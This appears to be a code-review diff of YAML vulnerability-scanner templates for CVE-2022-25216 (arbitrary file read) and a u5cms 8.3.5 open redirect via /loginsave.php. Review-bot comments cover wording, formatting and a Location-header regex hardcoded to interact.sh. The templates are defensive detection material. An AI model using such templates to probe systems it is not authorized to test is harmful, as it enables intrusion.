|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25216
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
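Review bot: the description drops "absolute path traversal", which is the precise mechanism described in the Tenable reference, and the name changes from "Arbitrary File Read" to "Local File Inclusion" even though the text says files are downloaded, not included; keep "absolute path traversal" in the description and prefer the original, more accurate name.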
@ -33,3 +33,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -4,10 +4,11 @@ info:
|
||||||
name: u5cms v8.3.5 - Open Redirect
|
name: u5cms v8.3.5 - Open Redirect
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: medium
|
severity: medium
|
||||||
description: An issue was discovered in u5cms verion 8.3.5 There is a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.
|
description: |
|
||||||
|
u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/u5cms/u5cms/issues/50
|
- https://github.com/u5cms/u5cms/issues/50
|
||||||
- https://www.cvedetails.com/cve/CVE-2022-32444
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32444
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
|
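Review bot: the description is converted to a `description: |` block scalar for a single sentence, while the other single-sentence descriptions in this PR (BigAnt, DVDFab) stay inline; pick one form for the set. The typo fix ("verion") and the cvedetails to NVD swap are fine.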
@ -25,3 +26,5 @@ requests:
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
|
# Enhanced by cs 05/30/2022
|
||||||
|
|
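Review bot: the Location regex hardcodes `interact\.sh`, so the open-redirect check is tied to one OAST domain and silently misses when `{{interactsh-url}}` resolves to a self-hosted server or a different default domain; match the Location header against the actual OAST host instead. The `# Enhanced by cs 05/30/2022` trailer also uses a different date format from the `2022/06/29` trailers elsewhere in this PR.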